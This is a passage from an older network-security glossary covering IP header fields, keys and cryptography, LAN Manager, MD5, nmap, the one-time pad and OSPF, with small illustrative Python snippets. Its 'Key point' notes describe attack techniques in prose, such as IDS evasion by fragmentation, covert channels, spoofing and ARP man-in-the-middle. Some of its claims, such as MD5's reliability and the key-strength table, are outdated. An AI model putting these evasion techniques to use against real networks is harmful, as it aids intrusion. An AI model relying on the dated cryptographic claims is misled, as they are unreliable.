Type of Service (ToS) ^	Rarely used in practice, the ToS field gives the router hints about how the packet should be routed. The typical example is a connection between Los Angeles and New York where a router can choose to send the packet across a low-speed land-line (dial-up) vs. a high-speed satellite connection. The latency for a land-line is a few milliseconds, whereas a satellite can be about a second. Therefore, you want the low latency for interactive connections like Telnet, but you want the high bandwidth for connections like FTP. Since this field isn't used much, hackers can use it as a covert channel.
Total Length ^	The total length of this IP datagram (header plus payload) in bytes. For a fragment, this is the length of that fragment rather than of the reassembled packet. See: fragmentation.
Identification ^	A unique ID number for the entire packet. All fragments of a packet carry the same ID. Key point: Tracking the ID field over time can help fingerprint the OS. Key point: Some systems use monotonically increasing IDs, so you can monitor activity on a remote machine by pinging it on a regular basis. Key point: A covert channel can be created by encapsulating information in this field. Key point: Windows machines, and many other systems based upon x86 CPUs, will use little-endian ID fields and monotonically increasing numbers. This means that the IP ID that follows 0x1234 will be 0x1334, not 0x1235.
Flags ^	There are two flags that control fragmentation. The DF (Don't Fragment) bit tells routers not to fragment this packet. The MF (More Fragments) bit indicates that this is not the last fragment in the packet. Key point: You can sometimes evade a network-based IDS by careful use of the DF bit and oversized packets that must be fragmented. See: fragmentation. Key point: Different systems check the flags differently. For example, in order to test for a SYN (which initiates a connection), code could check using either `(flags == TCP_SYN)` or `(flags & TCP_SYN)`. The first checks to see if the SYN, and only the SYN, is set. The second checks for SYN, but ignores the other flags. This can be useful in fingerprinting an OS or evading an intrusion detection system.
Fragment Offset ^	The offset from the start of the original packet at which this fragment starts. Key point: The Ping-of-Death exploit resulted from combining a fragment offset and a fragment length that together exceed the maximum IP packet size.
Time to Live (TTL) ^	This field indicates how many hops (routers) the packet can pass through before being discarded. Each router that forwards the packet decrements this field by one. When a router decrements the field to zero, it assumes a routing loop has occurred and sends an ICMP message back to the sender. Key point: After fragmentation, abuse of the TTL field is the most useful technique for manipulating IP headers. In addition, it is easy to manipulate this field at the sockets layer. Key point: The `traceroute` program finds all the routers in the path to a target by sending out many packets with varying TTL fields. Every router along the path therefore receives one packet whose TTL it decrements to zero, causing it to report its existence back to `traceroute`. Key point: Tracerouting through firewalls is sometimes possible by adjusting the TTL of TCP replies.
Protocol ^	This field indicates the next protocol header after the IP header. Examples are a value of 1 for ICMP, 6 for TCP, and 17 for UDP. Key point: Some rootkits use this as a way of invisibly transporting data since most systems cannot detect or log unknown protocols at this layer.
Source Address ^	The IP address of who sent the packet. This is included in every packet so that the destination knows who to respond to, and any errors can likewise be sent back to the sender. Key point: The IP address can be forged (spoofed). This can sometimes be useful despite the fact that it causes any responses to be sent back to the spoofed IP address rather than the real sender.
Destination Address ^	The IP address of where the packet is going to. Each router along the way compares this IP address to internal routing tables in order to figure out which direction to forward the packet.
Options ^	Additional options that can affect how the packet is routed. Multiple options can be specified. Key point: 99.999% of all IP packets have no options. Some IDSs trigger simply whenever they see an option field. Key point: The most common option used for attacks is source routing.
Padding ^	IP headers must be aligned on 32-bit boundaries, which may sometimes require null bytes to be added.
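
Example: The fixed 20-byte portion of the header described above can be decoded with a few lines of Python. This is only a sketch: the function name and the dictionary keys are invented for illustration, options are ignored, the checksum is not verified, and the sample bytes are hand-built with made-up addresses.

```python
import socket
import struct

def parse_ipv4_header(data):
    """Decode the fixed 20-byte part of an IPv4 header into a dict."""
    (ver_ihl, tos, total_length, ident, flags_frag,
     ttl, proto, checksum, src, dst) = struct.unpack("!BBHHHBBH4s4s", data[:20])
    return {
        "version": ver_ihl >> 4,                        # high 4 bits
        "header_bytes": (ver_ihl & 0x0F) * 4,           # IHL counts 32-bit words
        "tos": tos,
        "total_length": total_length,
        "id": ident,
        "df": bool(flags_frag & 0x4000),                # Don't Fragment
        "mf": bool(flags_frag & 0x2000),                # More Fragments
        "fragment_offset": (flags_frag & 0x1FFF) * 8,   # stored in 8-byte units
        "ttl": ttl,
        "protocol": proto,                              # 1=ICMP, 6=TCP, 17=UDP
        "checksum": checksum,
        "src": socket.inet_ntoa(src),
        "dst": socket.inet_ntoa(dst),
    }

# Hand-built sample: version 4, IHL 5, ID 0x1234, DF set, TTL 64, ICMP,
# checksum left at zero, 192.168.0.1 -> 192.168.0.2.
SAMPLE = bytes.fromhex("450000541234400040010000c0a80001c0a80002")

header = parse_ipv4_header(SAMPLE)
for name, value in header.items():
    print(f"{name:16} {value}")
```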

IP address [3]

On the Internet, your IP address is the unique number that others use to send you traffic.

Analogy: You own a phone. You have a phone number. Anybody anywhere in the world can dial your phone number and cause your phone to ring. You own a computer; it has an IP address. Anybody anywhere in the world can send traffic to your machine. In much the same way that you don't have to answer the telephone, if the traffic people send you isn't meaningful, your computer will ignore it. Since the machine generally ignores all unsolicited traffic, casual users on the Internet are rarely aware that hackers somewhere are trying to access their machine.

Key point: The IP address shows up inadvertently in many communications. By examining the details of e-mail headers, you can usually find the IP address that somebody sent e-mail from -- even if the user is behind a firewall. This is a common way that soi-disant hackers are caught: they attempt to use anonymous e-mail services to send mail, only to be caught by the inclusion of their IP address in the headers.

IPsec [3]

Security extensions to IP. Traditionally, encryption takes place at the application layer or above. IPsec provides generic encryption for IP packets in such a way that applications are not necessarily aware of the process. IPsec source code is freely available.

Key point: IPsec's main use today is when tunneling traffic for VPNs. It can also work for generic encryption of data between two hosts.

island-hopping [2]

To break into one system then use it as a beachhead to break into other systems.

History: This was the name for the U.S. military campaign during WW-II in order to take over islands closer and closer to the enemy, using each new island as a base from which to launch further attacks.

Key point: University systems, which are based upon the idea of openness and free sharing, are a hot-bed of compromised systems from which hackers launch attacks. Increasingly, home user machines attached to DSL lines and cable-modems are being compromised and used to launch attacks.

- J -

- K -

kerberos [3].

An authentication standard.

History: Developed at MIT in the 1980s as part of its project Athena (the netpc product that also spawned X Windows and other technologies). Kerberos has long been available as an add-on to virtually all UNIX systems. Version 4 was discovered to be insecure, and was followed by version 5. Microsoft implemented a variant of version 5 in Win2k.

Key point: Microsoft's implementation in Win2k is not quite standard, in much the same way that its implementations of PPP, PPTP, IPsec, etc. all make use of proprietary extensions.

kernel [2]

The core of the operating system. The kernel has complete control over everything that happens. When your computer crashes, it means the kernel has crashed. The kernel is designed to coordinate among the different components of the operating system, such as disk drive, networking, keyboard, and running programs.

Key point: The kernel is responsible for security, preventing one user's program from breaking into other programs running on the same system. All systems except the older Mac and Windows provide this level of security.

key [3]

In cryptography, the value needed to encrypt and/or decrypt something. It is usually a number or a short string less than 20 characters long.

Contrast: People are confused as to the difference between a key and a password. A key is a large number whereas a password is simply a series of letters (and possibly digits and punctuation). Since cryptography only uses keys, the password is generally converted to a number through the use of an appropriate mathematical function, like a hash. Public/private keys present a special difficulty in that they contain extremely large, unwieldy numbers that are protected by a separate password.
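
Example: A sketch of turning a password into a key with a hash-based function. PBKDF2 from Python's standard hashlib module is used here as one plausible choice, not as the method any particular product uses; the function name, salt, password, and iteration count are all made up for the demonstration.

```python
import hashlib

def key_from_password(password, salt, bits=128):
    """Derive a fixed-size key (as bytes) from a password of any length."""
    return hashlib.pbkdf2_hmac(
        "sha256",                    # underlying hash
        password.encode("utf-8"),    # the letters the user typed
        salt,                        # per-user random value, stored alongside
        100_000,                     # iteration count (illustrative)
        dklen=bits // 8,             # key length in bytes
    )

key = key_from_password("correct horse", b"example-salt")
print(len(key) * 8, "bit key:", int.from_bytes(key, "big"))
```

The same password and salt always produce the same number, which is what lets the system rebuild the key each time the user types the password.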

Contrast: There are two types of keys:

symmetric keys use the same key for both encryption and decryption
asymmetric (aka public/private key) are produced in pairs, where one key encrypts, but a mirror key must be used to decrypt the message, and somebody with one key cannot figure out the other key.

Contrast: A common question deals with the difference between 40-bit and 128-bit encryption in web browsers like Netscape. The answer is that the most obvious way to break the encryption and read the plain text is to simply try all possible keys. A 40-bit key has roughly one trillion (1,000,000,000,000) combinations. It could take your computer several weeks to try all these combinations. The implication: the average person only needs a few weeks to decrypt any message you send across the wire with a 40-bit browser, should they manage to sniff it from the wire. Every extra bit of key length means the key will take twice as long to crack. Therefore, if a system takes one week to crack a 40-bit key, it will take two weeks to crack a 41-bit key, and a 128-bit key will take 2^(128-40) times longer to crack than a 40-bit key (i.e. 309,485,009,821,345,068,724,781,056 times longer).
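
Example: The arithmetic above is easy to check. The helper names below are invented for illustration, and the model assumes the only attack is trying every key at a constant rate.

```python
def keyspace(bits):
    """Number of possible keys of the given length."""
    return 2 ** bits

def relative_effort(bits, baseline_bits=40):
    """How many times longer an exhaustive search takes than for the baseline."""
    return 2 ** (bits - baseline_bits)

print(f"{keyspace(40):,}")           # 1,099,511,627,776
print(relative_effort(41))           # 2
print(f"{relative_effort(128):,}")   # 309,485,009,821,345,068,724,781,056
```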

Example: The following table shows the relative difficulty in cracking keys.

Bits	Difficulty
8	paper and pencil (puzzle appears in Sunday paper)
16	tiny computer
32	your desktop computer
40	a few computers and a fair amount of time
56	custom hardware
64	distributed.net (a hundred thousand machines cranking away for a couple of years)
80	government agencies (NSA, CIA)
128	not crackable at the current time
256	quantum computers

Key point: Moore's Law breaks all cryptosystems, eventually. This, and only this, is why DES has become obsolete. Note: 40-bit and 128-bit keys refer to the RC4 algorithm used within web-browsers to talk to web servers via SSL. The U.S. restricts export of all software whose keys are longer than 40 bits in order to be able to spy on foreigners (ostensibly only in a military engagement).

Key point: Keys are generally just "session keys". This means they are dynamically generated at the beginning of a session, and exchanged with the partner using PKI.

Key point: Kerckhoffs's principle states that cryptography should be based upon the assumption that the enemy will discover all the details of your system. Therefore, all the security of the system should be held within the key. Not only that, the idea is that the details of the system should be actively published and publicized in the hopes that people will analyze the system, discover its weaknesses, and publish them before the enemy gets a chance to exploit them. All the best cryptosystems have been well published and analyzed in public forums.

key management (key distribution, key exchange )[4]

Key point: The need to exchange keys is the reason encryption protocols are not secure. There is an absolutely secure encryption method called a one-time-pad. However, in practice, you cannot exchange vast quantities of one-time-pads.

Key point: PKI essentially solves the key exchange problem.

keystroke logger [3]

A program that runs in the background that records all the keystrokes.

Key point: Once keystrokes are logged, they are shipped raw to the hacker. The hacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a key logger will reveal the contents of all e-mail composed by the user.

Key point: Keylog programs are commonly included in rootkits and remote administration trojans.

Key point: You can also purchase hardware devices that plug in between the keyboard and the main system (for PCs). These are OS independent: they simply start recording, and the hacker can later retrieve the device and instruct it to spit all the characters back out on the hacker's system.

known-plaintext [4]

The easiest way to brute-force a key is to obtain a sample of both the encrypted message and the original message. One can then try all possible ways of decrypting the message until one produces the equivalent plaintext. This reveals the key, which can then be used to decrypt the remainder of the message or other messages encrypted with the same key.

Contrast: Without known plaintext, key cracking is only a little more difficult. Running heuristics on the output of the decryption engine to recognize plausible plaintext makes the attack several times slower, but consider what that means: making it four times harder is only equivalent to adding 2 bits to the key length.

Key point: Most messages contain "headers" that represent known-plaintext. IP packets all have similar headers. E-mail messages all contain the same fields. Therefore, there is a fair amount of implicit plaintext that is known even when a decrypted sample of the message doesn't exist.
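
Example: A toy demonstration of a known-plaintext brute-force attack. The "cipher" is a deliberately weak repeating XOR with a 16-bit key, chosen only so that the search finishes instantly; it stands in for a real algorithm, and the key, message, and function names are all made up. The attacker knows only that the message starts with an e-mail style header.

```python
def xor_cipher(data, key):
    """Toy cipher: XOR data with a repeating 16-bit key (encrypts and decrypts)."""
    key_bytes = key.to_bytes(2, "big")
    return bytes(b ^ key_bytes[i % 2] for i, b in enumerate(data))

def brute_force(ciphertext, known_prefix):
    """Try every 16-bit key until the decryption starts with the known plaintext."""
    sample = ciphertext[:len(known_prefix)]
    for key in range(2 ** 16):
        if xor_cipher(sample, key) == known_prefix:
            return key
    return None

SECRET_KEY = 0xBEEF  # made-up key; the attacker never sees this
message = b"From: alice@example.com\nSubject: lunch\n"
ciphertext = xor_cipher(message, SECRET_KEY)

# The attacker guesses that the message begins with a standard header field.
found = brute_force(ciphertext, b"From: ")
recovered = xor_cipher(ciphertext, found)
print(hex(found))
print(recovered.decode())
```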

- L -

LAN (Local Area Network)[1]

On the Internet, you have the "local" machines near you and the "remote" machines across the Internet. Your local network is known as the LAN, and is usually based upon Ethernet.

Key point: Local machines are usually much easier to break into than remote machines across the Internet. For example, you can spoof ARP packets in order to execute man-in-the-middle exploits against your local neighbors.

See also: VLAN

LAN Manager [4]

LAN Manager is the older file server product from Microsoft and IBM. The details of this aren't all that important except that backwards compatibility has introduced security holes in products 10 years later. LAN Manager authentication splits a password into two case-insensitive parts that are 7 letters each. Therefore, if your password was "RobertGraham.com", under LAN Manager it would be the same as "ROBERTG RAHAM.C". Whereas new products like Win98, WinNT, and SAMBA support newer/stronger authentication methods, the need for backwards compatibility often exposes the LAN Manager password, which can easily be cracked.
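
Example: The splitting step described above can be sketched in a few lines. This shows only how the password is truncated, upper-cased, and cut in two; the hashing that LAN Manager then applies to each half is omitted, and the function name is invented for illustration.

```python
def lanman_halves(password):
    """Return the two 7-character, upper-cased halves LAN Manager works with."""
    # Truncate to 14 characters, upper-case, and pad short passwords with NULs.
    padded = password.upper()[:14].ljust(14, "\0")
    return padded[:7], padded[7:]

print(lanman_halves("RobertGraham.com"))  # ('ROBERTG', 'RAHAM.C')
```

Because each half can be attacked on its own, the cracker faces two 7-character problems rather than one 14-character problem.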

LDAP [3]

A directory service, LDAP (Lightweight Directory Access Protocol) is used by e-mail programs (Microsoft, Netscape, Eudora, etc.) to allow you to look up a person's name in a corporate database and find their e-mail address, phone number, and other information that the corporate admins decided to put in there.

Key point: Most corporate LDAP servers have little or no authentication. Finding LDAP servers and downloading their contents is an important step in the reconnaissance phase of a hacking attack.

Key point: While LDAP is in theory lightweight, in practice it is still fairly complicated. There are numerous implementation and deployment bugs that can be exploited in order to break into servers.

least privilege [4]

In paranoid environments, the guiding principle is that of least privilege, meaning that users are granted only the minimal rights needed in order to get their job done, and no more.

Example: System administrators typically have multiple accounts with different rights. For example, when I'm logged in as a normal user, I do not have rights to administer my own machine. I must log in with a separate account in order to do such things, then log out as soon as I'm done.

libnet [4]

Allows low-level manipulation of TCP/IP headers that is impossible for normal programs.

Key point: Most programs go through a high-level interface (like sockets) in order to send traffic on the network. Sometimes, for security or hacking reasons, a program needs to construct its own network headers. The existing TCP/IP stack is unable to build these headers, so you must bypass it and go directly to the hardware drivers. Libnet is a library that makes custom packet generation easier.

libpcap [4]

Allows low-level capture of network traffic. Most UNIX-based sniffers use this library.

TODO:

lp (line printer) [1]

TODO:

Linux [1]

TODO:

lsof [4]

This tool shows all the open file handles, sockets, and who owns them.

Links: You can download lsof from the following mirrors:


ftp://vic.cc.purdue.edu/pub/tools/unix/lsof/

ftp://ftp.crc.doc.ca/packages/lsof/

ftp://ftp.sunet.se/pub/unix/admin/lsof/

- M -

MAC address [4]

Every piece of Ethernet hardware has a unique number assigned to it called its MAC address. Remember that Ethernet is used locally to connect you to the Internet, and you share the local network with many other people. The MAC address is used by your local Internet router in order to direct your traffic to you rather than somebody else in your local area.

Key point: The MAC address is 6 bytes long, and must be unique. In order to guarantee uniqueness, equipment vendors are assigned a unique 3-byte prefix, and they then assign their own 3-byte suffix. Thus, the first 3 bytes of a MAC address identify what kind of hardware you have (3Com, Cisco, Intel, etc.).
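
Example: A small sketch that splits a MAC address into the vendor prefix and the vendor-assigned suffix. The function name is hypothetical and the address is made up; mapping the prefix to a vendor name would require a lookup table that is not included here.

```python
def split_mac(mac):
    """Split a MAC address into (vendor prefix, vendor-assigned suffix)."""
    octets = mac.replace("-", ":").lower().split(":")
    if len(octets) != 6 or any(len(o) != 2 for o in octets):
        raise ValueError(f"not a 6-byte MAC address: {mac!r}")
    for o in octets:
        int(o, 16)  # raises ValueError if an octet is not hexadecimal
    return ":".join(octets[:3]), ":".join(octets[3:])

prefix, suffix = split_mac("00:A0:C9:12:34:56")  # made-up address
print("vendor prefix:", prefix)
print("device suffix:", suffix)
```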

Key point: The uniqueness property of MAC addresses has interesting implications. It was an important clue in tracking down David Smith (the Melissa author).

malware [4]

In an abstract world, the world consists of plants and animals (flora and fauna). Hardware makes up the flora; automated programs with a life of their own (malware) make up the fauna. Examples: viruses/virii, Trojan Horses, RATs (Remote Administration Trojans), spiders, bots, logic bombs.

man-in-the-middle attack [4]

An attack where the hacker interposes himself in the middle between two people. Culture: Historically, when talking about such attacks, the hacker is given male names starting with the letter M (like Mark, Mawry, etc.).

Key point: This often means that both sides of a connection really need to authenticate themselves. For example, when you log into a server, you really want to be assured it is the real server you are talking to, rather than Mark who is forwarding your requests to the real server using your identity.

masquerade [1]

An attack where somebody forges their identity, either by supplying false credentials when authenticating or by hijacking existing connections through man-in-the-middle attacks.

MD5 (Message Digest #5, 1.2.840.113549.2.5)[3]

MD5 is the most popular hash algorithm. It processes an input file or message into a "unique" 128-bit fingerprint. This fingerprint is believed to be "unique"; while it is theoretically possible that two inputs could hash to the same fingerprint, it is nearly statistically impossible.
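
Example: Computing MD5 fingerprints with Python's standard hashlib module. The inputs are arbitrary; the point is that the fingerprint is always 128 bits long, whatever the size of the input, and that a one-character change produces an unrelated-looking value.

```python
import hashlib

def md5_fingerprint(data):
    """Return the MD5 fingerprint of a byte string as 32 hex digits (128 bits)."""
    return hashlib.md5(data).hexdigest()

print(md5_fingerprint(b""))              # d41d8cd98f00b204e9800998ecf8427e
print(md5_fingerprint(b"hello world"))
print(md5_fingerprint(b"hello worle"))   # one character changed
```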

Key point: MD5 is currently enjoying a high degree of popularity. It is the most popular hashing algorithm, used in SSL, PGP, HTTP authentication, Tripwire, and many other places.

Melissa Virus/Worm [1]

In early 1999, the Melissa virus/worm took down much of the Internet for a couple of days.

Controversy: Many security technologies (anti-virus, firewalls, mobile code) are based upon the concept of querying the user with the question: There is a security issue here, are you sure you want to continue? Security professionals have long warned that such dependency is unreliable -- users have to be lucky in answering the questions right all the time, whereas the hacker needs to get lucky only a few times. In the case of the Melissa virus, every user that spread the virus was first prompted with the query: This document contains macros, do you want to run them?, and answered incorrectly.

memory [1]

Key point: Memory gets erased when the computer is turned off. For this reason, one security technique is to store things only in memory. For example, when you first log onto a computer, it will remember your password in memory so that as you access other resources, it can use that password instead of prompting you repeatedly. With this technique, the password is never saved to disk. This means if somebody unplugs your computer and runs away with it, they cannot steal your password. One problem with this technique is that occasionally the memory is swapped to disk anyway.

message [1]

In cryptography, you will often hear the word message in reference to any data. Culturally, this comes from the WW-II era, when the only things encrypted were messages. These days we have encrypted communication channels (with no real message boundaries) and encrypted files, but conceptually we still model the problem of cryptography around messages.

Metcalfe's Law [1]

A philosophical point of view: "The power of the network increases exponentially by the number of computers connected to it. Therefore, every computer added to the network both uses it as a resource while adding resources in a spiral of increasing value and choice."
-- Dr. Bob M. Metcalfe, inventor of Ethernet, co-founder of 3Com, editor-in-chief of InfoWorld.

The idea is that the power of the Internet is not simply all the websites that you can access (linear), but the power represented by everyone else also on the Internet (exponential). For example, organizations like http://www.distributed.net can not only harness lots of machines in order to tackle large problems (linear), but they also can exploit the word-of-mouth on the Internet to sign up (exponential). Similarly, consider the growth in sites like http://www.slashdot.org that start out as hobbyist sites, but eventually blossom into large money making ventures, tossing pre-Internet-age business philosophies on their ear.

Key point: Hacker attacks grow exponentially because more and more hackers are getting online (especially from 3rd world countries) and more and more resources (businesses) are getting online.

Key point: The amount of computing resources a hacker can tap into from his/her computer desktop is more than the combined might of all governments and militaries.

mission critical [2]

Describes a system that is absolutely necessary. It comes from NASA where mission critical elements were those items that had to work otherwise the billion dollar space mission would blow up.

Key point: A big problem with corporations is that they do not spend enough time hardening mission critical applications, or spend too much effort on non-mission critical elements.

mobile code [3]

A term that describes any software that is mobile, being passed from one system to another. In particular, it is used to describe applets within web browsers based upon Microsoft's ActiveX, Sun's Java, or Netscape's JavaScript technologies.

Moore's Law [1]

Gordon Moore, one of the founders of Intel, remarked in the late 1960s that computing power seemed to double every 12 to 18 months. This prophecy is remarkably accurate. With the rise of the Internet and computing in our lives, this Law has become a basic feature of our society every bit as much as Newton's Laws.

Key point: Every bit of key length doubles the security, making it twice as difficult to crack. However, because of Moore's Law, every year that passes makes all keys twice as easy to crack. Therefore, if it takes 1-week to break a message encrypted with a 40-bit key, it will likewise take 1-week to break a message encrypted with a 128-bit key roughly 100 years from now.
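
Example: The "roughly 100 years" figure can be checked with one line of arithmetic: each extra bit costs one doubling period. The function name is invented, and the model assumes cracking speed doubles at a perfectly steady rate, which is of course a simplification.

```python
def years_until_equivalent(bits, baseline_bits=40, doubling_years=1.0):
    """Years until cracking `bits` takes as long as `baseline_bits` does today."""
    return (bits - baseline_bits) * doubling_years

print(years_until_equivalent(128))                       # 88.0 (doubling yearly)
print(years_until_equivalent(128, doubling_years=1.5))   # 132.0 (every 18 months)
```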

MTU (Maximum Transmission Unit)[5]

In TCP/IP, the MTU is the largest IP packet that can be transmitted on the network. The MTU for Ethernet, for example, is 1500 bytes. The problem arises when a router is connected to two networks with different MTUs: it must fragment any packet that is too large for the next network.

Key point: Path MTU is the smallest MTU among all the segments that a packet must travel through. A lot of WAN links have MTUs on the order of 576 bytes. Therefore, packets traveling through such networks will be heavily fragmented.
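
Example: A back-of-the-envelope sketch of how many fragments result when a full-sized Ethernet packet crosses a 576-byte link. It takes the path MTU to be the smallest link MTU, assumes a 20-byte IP header with no options, and uses invented function names; every fragment except the last must carry a multiple of 8 bytes of data, since fragment offsets are counted in 8-byte units.

```python
import math

IP_HEADER_BYTES = 20  # assumes no IP options

def path_mtu(link_mtus):
    """The path MTU is limited by the smallest link along the way."""
    return min(link_mtus)

def fragment_count(packet_bytes, mtu):
    """Number of fragments when a packet is forwarded onto a link with this MTU."""
    if packet_bytes <= mtu:
        return 1
    payload = packet_bytes - IP_HEADER_BYTES
    # Each fragment gets its own header; data is rounded down to 8-byte units.
    per_fragment = (mtu - IP_HEADER_BYTES) // 8 * 8
    return math.ceil(payload / per_fragment)

mtu = path_mtu([1500, 576, 1500])   # Ethernet, WAN link, Ethernet
print(mtu)                          # 576
print(fragment_count(1500, mtu))    # 3
```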

Key point: IDSs hooked up to a hybrid Token Ring (MTU=16k) and Ethernet (MTU=1.5k) network generate lots of false positives about the large amount of fragmentation going on.

multi-homed [5]

A computer may have multiple adapters and multiple IP addresses. We call these multi-homed hosts. The existence of such machines makes some security processes difficult. UDP based transactions (like DNS) sometimes show anomalies because the responses come back from IP addresses different than the one the request was sent to. Sun workstations demonstrate an even more difficult problem: if multiple adapters are installed within the workstation, they are all assigned the same MAC address. Sometimes people hook both adapters to the same Ethernet network. This means that every incoming packet is received by both adapters, so every request is seen multiple times, and responded to multiple times. The symptoms are that on UDP based protocols, every request sent to the multi-homed Sun computer gets multiple responses back.

Key point: Misconfigured multi-homed hosts are common enough that distinguishing their anomalies from hacker anomalies is difficult.

- N -

NAT [3]

Network Address Translation, NAT is a way of providing access to the Internet through a single machine that translates the IP addresses. The NAT itself has one or more IP addresses, but all the machines behind the NAT have "private" Internet addresses.

Contrast: A NAT provides some firewalling capabilities because it isolates the end-nodes while still providing access to the Internet. The isolation is better than packet-filter firewalls, but not as good as proxies.

NetBIOS [3]

In Windows, NetBIOS is a way for writing network-aware applications, much like sockets is for UNIX.

Misunderstanding: Like sockets, many different protocols can be used to transport applications written to the NetBIOS API. When you say "NetBIOS", some people will understand you to mean the TCP/IP transport. Other people will think of "NetBEUI", which is the transport over raw Ethernet without any intervening routable network protocol. Use the term "NBT" (NetBIOS-over-TCP) or "NetBEUI" to avoid confusion.

Contrast: Microsoft's "File and Print Sharing" uses the SMB protocol over NetBIOS. Microsoft supports the NetBIOS interface over TCP/IP, NetBEUI, and Novell's IPX/SPX. Home users who share files among their own machines mistakenly enable File and Print Sharing using the TCP/IP transport, allowing hackers anywhere on the Internet access to their machine. Instead, they should configure it over the NetBEUI transport so that nobody outside their network can access their files (note: this still might open up their networks to people on the same cable-modem VLAN ).

History: Originally developed by SyTek for IBM. It was implemented in the ROM of IBM's broadband Ethernet (3-mbps, over cable TV coax rather than normal Ethernet coax, separate send/receive channels).

More: If you maintain a firewall, you will see regular NetBIOS requests in your logs. Read the document http://www.robertgraham.com/pubs/firewall-seen.html#netbios for more info.

NIT [5]

Network Interface Tap. The system for SunOS 4 that allows sniffing packets off the wire. Replaced by DLPI in Solaris.

nmap [2]

nmap is the most popular hacker tool for doing reconnaissance scans against a target network. It is available at http://www.insecure.org/nmap/

Key point: nmap is preferred over vulnerability scanners because it is much less noisy. Hackers prefer focused tools that do their job well rather than comprehensive tools that likely do unwanted things.

nonce [5]

In communications, a nonce is a specific value inserted into the message in order to defend against replay attacks. A nonce is usually random.
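
Example: A minimal sketch of how a nonce defeats a replay. The server hands out a random value, accepts a request carrying it once, and refuses any later request that reuses it. The class and method names are hypothetical, and a real protocol would also bind the nonce to the request cryptographically (for example with a signature), which is omitted here.

```python
import secrets

class Server:
    """Hypothetical server that accepts each issued nonce exactly once."""

    def __init__(self):
        self._outstanding = set()

    def issue_nonce(self):
        nonce = secrets.token_hex(16)  # 128 random bits, hex-encoded
        self._outstanding.add(nonce)
        return nonce

    def accept(self, nonce, request):
        if nonce not in self._outstanding:
            return False               # unknown or already used: a replay
        self._outstanding.discard(nonce)
        return True

server = Server()
nonce = server.issue_nonce()
first = server.accept(nonce, "transfer $10")    # the legitimate request
replay = server.accept(nonce, "transfer $10")   # a sniffed copy sent again
print(first, replay)  # True False
```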

non-repudiation [5]

One of the main classes of infosec, non-repudiation is the idea that somebody cannot "renege" on an action.

TODO

NSA (National Security Agency)[1]

The NSA is the government department for U.S. national security. All cryptographic work done by the government is done under the auspices of the NSA. The NSA probably employs some of the best/brightest cryptographers in the world. The NSA does a fair amount of eavesdropping/spying on people in foreign countries.

NTFS [3]

NT File System. An optional way of formatting disks under WinNT that contains numerous performance, reliability, and security enhancements over the older FAT filesystem found in DOS.

Key point: Hardened WinNT computers should use NTFS exclusively. After installation, some file and directory permissions need to be adjusted.

Key point: NTFS supports a feature called "alternate datastreams" (similar to Macintosh data and resource forks) that can be used to attach data to files in a hidden way. The additional information does not appear to change the size of the file in directory listings.

- O -

obscurity [2]

A philosophy where people believe in the theory of Security through obscurity: hiding in the hopes that hackers can't find you. In practice, this theory is found to be wrong.

Example: Many people put their POP3 service at a different port than port 110 as a way to foil attacks against that port. However, a simple port scan reveals this port, and the banner reveals what service is running at that port.

Key point: The security landscape is littered with foolish people who try short-cuts around the tried-and-true techniques.

Key point: Obscuring information always helps security. The only question is whether it is your prime security defense, or an adjunct to it.

Key point: Do the math: if you obscure things such that a successful attack is 99% less likely, this means 10 out of a thousand attacks will still succeed. In general, hackers have the resources to throw billions of attacks against an obstacle: it's just automated computer time and network traffic.

one-time pad (OTP, Vernam Cipher)[2]

In cryptography, the one-time pad encrypts data by XORing the plaintext against a stream of completely random bits. In theory, the one-time pad is the only unbreakable encryption algorithm, even with infinite resources or quantum computers. This is because if the key (aka. pad) is totally random, then the ciphertext will be random as well.
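
The XOR step can be sketched in a few lines of Python. This is only an illustration: the message is made up, and `secrets.token_bytes` stands in for a source of truly random pad material.

```python
import secrets


def otp_xor(data: bytes, pad: bytes) -> bytes:
    """XOR each data byte with the matching pad byte (encrypts and decrypts)."""
    if len(pad) < len(data):
        raise ValueError("pad must be at least as long as the data")
    return bytes(d ^ p for d, p in zip(data, pad))


plaintext = b"ATTACK AT DAWN"
pad = secrets.token_bytes(len(plaintext))  # random pad, same length as message
ciphertext = otp_xor(plaintext, pad)
recovered = otp_xor(ciphertext, pad)       # XOR with the same pad undoes it
```

The same function serves for both directions because XORing twice with the same value returns the original byte.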

Problem: While the one-time pad is perfectly secure in theory, it has problems in practice, and is rarely used. The major problem is how one distributes the one-time pads to all the receivers. This can be done in some cases, such as sending out CD-ROMs full of random bits with soldiers on the battle-fields, but it becomes unwieldy for normal uses of cryptography.

Key point: The pad (secret key) can be used only once. If it is ever used twice, then much of the plaintext can be easily recovered. This means that the pad must be as long as the data being encrypted.
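
To see why reuse is fatal, consider this small Python sketch. The pad and both messages are made-up values chosen for illustration:

```python
def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings of equal length."""
    return bytes(x ^ y for x, y in zip(a, b))


pad = bytes.fromhex("8f3a1c77e2059bd4")  # hypothetical 8-byte pad, reused by mistake
p1 = b"MEET NOW"
p2 = b"STAY PUT"
c1 = xor_bytes(p1, pad)
c2 = xor_bytes(p2, pad)

# The pad cancels out: c1 XOR c2 equals p1 XOR p2, with no key material left.
leak = xor_bytes(c1, c2)

# Anyone who knows (or guesses) one plaintext recovers the other directly.
recovered_p2 = xor_bytes(leak, p1)
```

An eavesdropper holding only the two ciphertexts never needs the pad itself; guessing likely words in one message reveals the matching stretch of the other.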

History: The one-time pad is credited to G. S. Vernam, who devised the cipher in 1917 and published it in 1926. It saw heavy use during WWII and is still used today in diplomatic corps.

Rumor: There are many short-wave radio stations throughout the world broadcasting a human voice reading off long lists of numbers. These are thought to be messages sent to spies throughout the world who decode them with one-time pads.

Key point: Today's encryption algorithms are based upon the theoretical underpinnings of the one-time pad.

Orange Book [3]

A member of the Rainbow Series, it describes different classifications of a secure system. The four main classifications are:

D - not secure
C (C1, C2) - discretionary (different parts are secure in a different way)
B (B1, B2, B3) - mandatory, meaning that everything on the system must be locked down
A (A1) - verified, meaning everything is double-checked according to rigorous standards

OSPF (Open Shortest Path First)[3]

OSPF is a "routing" protocol. It is used by routers (inside an ISP or corporation) to figure out which paths packets should take when forwarded through the network.

Key point: OSPF can easily be subverted by "local" hackers. This means that the hacker generally has to be within the network area he/she wishes to subvert. The hacker will either pretend to be a router, or spoof packets from nearby routers. The most common technique is to "advertise" false information (spoofed Link State Advertisements, or LSAs).

one-time password [3]

TODO: skey

OS (operating system) [2]

TODO:

own [2]

A hacker culture term that means to control completely. A machine that has been broken into and is completely under the control of the hacker is "owned".

See also: attitude

- P -

packet [1]

